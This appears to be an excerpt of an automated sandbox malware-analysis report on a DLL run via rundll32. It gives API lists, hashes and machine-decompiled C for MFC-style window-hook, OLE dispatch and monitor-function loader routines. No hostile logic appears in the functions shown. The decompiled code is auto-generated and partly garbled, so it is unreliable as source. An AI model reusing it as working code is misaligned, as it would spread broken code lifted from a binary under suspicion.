0x00000000
0x1001c95b
0x1001c963
0x1001cb60
0x1001cb65
0x1001cb65

APIs

__EH_prolog3_GS.LIBCMT ref: 1001C91F

Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D

CallNextHookEx.USER32 ref: 1001C963

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
SetWindowLongA.USER32 ref: 1001CA26
_memset.LIBCMT ref: 1001CA70
GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
SetWindowLongA.USER32 ref: 1001CB28
CallNextHookEx.USER32 ref: 1001CB40
UnhookWindowsHookEx.USER32 ref: 1001CB54

Strings

ime, xrefs: 1001C9DA
#32768, xrefs: 1001CA82, 1001CA87, 1001CAD1
AfxOldWndProc423, xrefs: 1001CAF8, 1001CAFD, 1001CB08, 1001CB10, 1001CB19

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 867647115-4034971020
Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1002DB49 Relevance: 28.9, APIs: 19, Instructions: 423
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E1002DB49(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				signed int _t194;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				signed int _t291;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E10030D27(E10044FCE, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E10030DFF(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E10030030(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x100492f8;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 = _t194 - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if(_t194 == _t257) {
					L37:
					_t295 = 0;
					E1002BDD9(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E10030030(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					_t289 = _t300 - 0x54;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1004b61c, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E1002DAF2(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E10014517(_t257, _t289, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E1002CDE9(_t300 - 0x68, _t289);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E10014517(_t257, _t289, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M1002E0D9))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E1002BC90(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E1001FCED(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E100144EC(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E1002D549(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								E1001FF59(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								E1001FF59(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								E1001FF59(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E10033135(_t300 + 0x14, 0x100505f8);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t291 = _t194 * _t290 >> 0x20;
					_t297 = E100144EC(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E10030030(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M1002E08D))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E1002CA61(_t300 - 0x34, _t299, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E1002CE83(_t300 - 0x68, _t291, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E10014517(_t258, _t291, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M1002E03D))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E100200B9(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E100012C0(__ecx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E100201BD(__ecx);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}

0x1002db49
0x1002db50
0x1002db55
0x1002db58
0x1002db5c
0x1002e035
0x1002e03a
0x1002e03a
0x1002db62
0x1002db65
0x1002db68
0x1002db6b
0x1002db75
0x1002db78
0x1002db7d
0x1002db83
0x1002db8e
0x1002db8e
0x1002db95
0x1002db9c
0x1002dba1
0x1002dba8
0x1002dba8
0x1002dbab
0x1002dbb2
0x1002dbb5
0x1002dbb8
0x1002dbbb
0x1002dbbe
0x1002dbc1
0x1002dbc5
0x1002dbc9
0x1002dbca
0x1002ddea
0x1002ddee
0x1002ddf0
0x1002ddf9
0x1002ddfb
0x1002ddfb
0x1002de08
0x1002de10
0x1002de12
0x1002de27
0x1002de3e
0x1002de41
0x1002de46
0x1002de4b
0x1002de76
0x1002de76
0x1002de79
0x1002de82
0x1002de85
0x1002df5a
0x1002df5a
0x1002df60
0x1002e017
0x1002e01a
0x1002e01e
0x1002e023
0x1002e027
0x1002e02a
0x1002e02c
0x1002e02f
0x1002e034
0x00000000
0x1002e02a
0x1002df6a
0x1002df8f
0x1002df92
0x1002df95
0x1002df98
0x00000000
0x00000000
0x1002df9a
0x00000000
0x1002dfab
0x1002dfb2
0x00000000
0x00000000
0x1002e00f
0x1002e012
0x1002e015
0x00000000
0x00000000
0x1002dfca
0x1002dfcd
0x00000000
0x00000000
0x1002dfd4
0x1002dfd7
0x00000000
0x00000000
0x1002dfb7
0x1002dfba
0x1002dfbd
0x1002dfbf
0x1002dfc2
0x00000000
0x00000000
0x1002dfe1
0x1002dfe6
0x1002dfe9
0x00000000
0x00000000
0x1002dff1
0x1002dff4
0x1002dff6
0x1002dffa
0x1002dffd
0x00000000
0x00000000
0x1002e001
0x1002e004
0x1002e007
0x1002e008
0x1002e009
0x1002e00a
0x1002e00b
0x00000000
0x00000000
0x00000000
0x00000000
0x1002dfa7
0x00000000
0x00000000
0x1002df9a
0x1002df6e
0x1002df73
0x1002df79
0x1002df7b
0x1002df7d
0x00000000
0x00000000
0x1002df83
0x1002df89
0x1002dea1
0x1002dea1
0x1002dea6
0x1002dea6
0x1002dea9
0x1002deb2
0x1002deb2
0x1002deb7
0x1002debd
0x1002dec0
0x1002dec2
0x1002dec6
0x1002dec8
0x1002ded0
0x1002ded1
0x1002ded7
0x1002ded7
0x1002ded9
0x1002dedf
0x1002dee5
0x1002deed
0x1002def5
0x1002def8
0x1002def8
0x1002df03
0x1002df09
0x1002df0b
0x1002df12
0x1002df17
0x1002df1a
0x1002df1a
0x1002df22
0x1002df24
0x1002df2b
0x1002df30
0x1002df33
0x1002df33
0x1002df3b
0x1002df40
0x1002df46
0x1002df52
0x1002df55
0x00000000
0x1002df55
0x1002de8f
0x1002de95
0x1002de9c
0x00000000
0x00000000
0x1002de9e
0x00000000
0x1002de4d
0x1002de50
0x1002de56
0x1002de71
0x1002de71
0x1002de74
0x00000000
0x00000000
0x1002de5c
0x1002de5e
0x1002de60
0x1002de66
0x1002de67
0x1002de6d
0x1002de6d
0x1002de70
0x1002de70
0x00000000
0x1002de70
0x1002de62
0x1002de64
0x00000000
0x00000000
0x00000000
0x1002de64
0x00000000
0x1002de71
0x1002dbd0
0x1002dbd4
0x1002dbd5
0x1002dbe4
0x1002dbef
0x1002dbf2
0x1002dbfa
0x1002dbfd
0x1002dc00
0x1002dc06
0x1002dc06
0x1002dc0a
0x1002dc0d
0x1002dc10
0x00000000
0x00000000
0x1002dc16
0x1002dc1b
0x1002dc1e
0x1002dc24
0x1002dc27
0x1002dc2a
0x1002dc2d
0x1002dc33
0x1002dc36
0x1002dc39
0x1002dc43
0x1002dc43
0x1002dc46
0x1002dc4e
0x1002dc50
0x1002dd6d
0x1002dd72
0x1002dd75
0x00000000
0x00000000
0x1002dd77
0x00000000
0x00000000
0x00000000
0x1002dd7e
0x1002dd81
0x1002dd83
0x1002dd89
0x1002dd93
0x1002dd9a
0x1002dd9c
0x1002dda8
0x1002ddac
0x1002ddb1
0x1002ddb5
0x1002ddb9
0x1002ddbb
0x1002ddbe
0x1002ddc3
0x00000000
0x00000000
0x00000000
0x00000000
0x1002dc56
0x1002dc56
0x1002ddc6
0x1002ddc6
0x1002ddc9
0x1002ddc9
0x1002ddcd
0x00000000
0x1002ddcd
0x1002dc5d
0x1002dc61
0x00000000
0x00000000
0x1002dc67
0x00000000
0x1002dc7c
0x1002dc7f
0x1002dc81
0x00000000
0x00000000
0x00000000
0x00000000
0x1002dca4
0x1002dca8
0x1002dcad
0x1002dcb0
0x00000000
0x00000000
0x1002dcb7
0x1002dcbb
0x1002dcc0
0x1002dcc3
0x00000000
0x00000000
0x1002dcca
0x1002dccd
0x1002dccf
0x00000000
0x00000000
0x1002dcd3
0x1002dcd6
0x1002dcd8
0x1002dcda
0x1002dcdb
0x1002dcde
0x1002dce4
0x1002dce8
0x1002dcea
0x00000000
0x00000000
0x1002dcf0
0x1002dcf2
0x00000000
0x00000000
0x00000000
0x00000000
0x1002dd45
0x1002dd48
0x1002dd4c
0x1002dd4e
0x1002dd50
0x1002dd50
0x00000000
0x00000000
0x1002dd55
0x1002dd59
0x1002dd5c
0x1002dd5f
0x1002dd61
0x1002dd62
0x1002dd63
0x1002dd64
0x1002dd65
0x1002dd68
0x1002dd6a
0x00000000
0x00000000
0x1002dcfd
0x1002dcfd
0x1002dd00
0x1002dd02
0x1002dd04
0x1002dd05
0x1002dd08
0x1002dd0b
0x1002dd10
0x1002dd13
0x1002dd17
0x1002dd1d
0x1002dd21
0x1002dd23
0x1002dd29
0x1002dd29
0x1002dd2c
0x1002dd2f
0x1002dd32
0x1002dd37
0x1002dd3b
0x00000000
0x1002dd3b
0x1002dd25
0x1002dd27
0x1002dcf8
0x1002dcf8
0x00000000
0x1002dcf8
0x00000000
0x00000000
0x00000000
0x00000000
0x1002dc6e
0x1002dc71
0x1002dc75
0x00000000
0x00000000
0x1002dc89
0x1002dc8c
0x1002dc8f
0x1002dc92
0x1002dc92
0x1002dc95
0x1002dc95
0x1002dc97
0x1002dc9c
0x00000000
0x00000000
0x1002dc67
0x1002ddcf
0x1002ddcf
0x1002ddd3
0x1002ddd6
0x1002dddf
0x1002dddf
0x1002dde8
0x00000000
0x1002dde8

APIs

__EH_prolog3.LIBCMT ref: 1002DB50
_memset.LIBCMT ref: 1002DB78
lstrlenA.KERNEL32(?), ref: 1002DB88
_memset.LIBCMT ref: 1002DBF2
_memset.LIBCMT ref: 1002DE08
VariantClear.OLEAUT32(?), ref: 1002DE67
VariantClear.OLEAUT32(?), ref: 1002DE8F
SysStringLen.OLEAUT32(?), ref: 1002DEE9
SysFreeString.OLEAUT32(?), ref: 1002DF09
SysStringLen.OLEAUT32(?), ref: 1002DF0E
SysFreeString.OLEAUT32(?), ref: 1002DF22
SysStringLen.OLEAUT32(?), ref: 1002DF27
SysFreeString.OLEAUT32(?), ref: 1002DF3B
__CxxThrowException@8.LIBCMT ref: 1002DF55
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 1002DF73
VariantClear.OLEAUT32(?), ref: 1002DF83

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
String ID:
API String ID: 4128688680-0
Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10018B59 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E10018B59() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x100572e4; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x100572e8 = E10018B01(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x100572c8 = 0;
						 *0x100572cc = 0;
						 *0x100572d0 = 0;
						 *0x100572d4 = 0;
						 *0x100572d8 = 0;
						 *0x100572dc = 0;
						 *0x100572e0 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x100572c8 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x100572cc = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x100572d0 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x100572d4 = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x100572dc = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x100572d8 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x100572e0 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x100572e4 = 1;
					return _t5;
				} else {
					_t24 =  *0x100572d8; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

0x10018b5c
0x10018b62
0x10018b71
0x10018b7d
0x10018b88
0x10018b8a
0x10018b8c
0x10018c20
0x10018c20
0x10018c26
0x10018c2c
0x10018c32
0x10018c38
0x10018c3e
0x10018c44
0x10018c4a
0x10018b92
0x10018b9e
0x10018ba0
0x10018ba2
0x10018ba7
0x00000000
0x10018ba9
0x10018baf
0x10018bb1
0x10018bb3
0x10018bb8
0x00000000
0x10018bba
0x10018bc0
0x10018bc2
0x10018bc4
0x10018bc9
0x00000000
0x10018bcb
0x10018bd1
0x10018bd3
0x10018bd5
0x10018bda
0x00000000
0x10018bdc
0x10018be2
0x10018be4
0x10018be6
0x10018beb
0x00000000
0x10018bed
0x10018bf3
0x10018bf5
0x10018bf7
0x10018bfc
0x00000000
0x10018bfe
0x10018c04
0x10018c06
0x10018c08
0x10018c0d
0x00000000
0x10018c0f
0x10018c11
0x10018c11
0x10018c11
0x10018c0d
0x10018bfc
0x10018beb
0x10018bda
0x10018bc9
0x10018bb8
0x10018ba7
0x10018c14
0x10018c1f
0x10018b64
0x10018b66
0x10018b70
0x10018b70

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
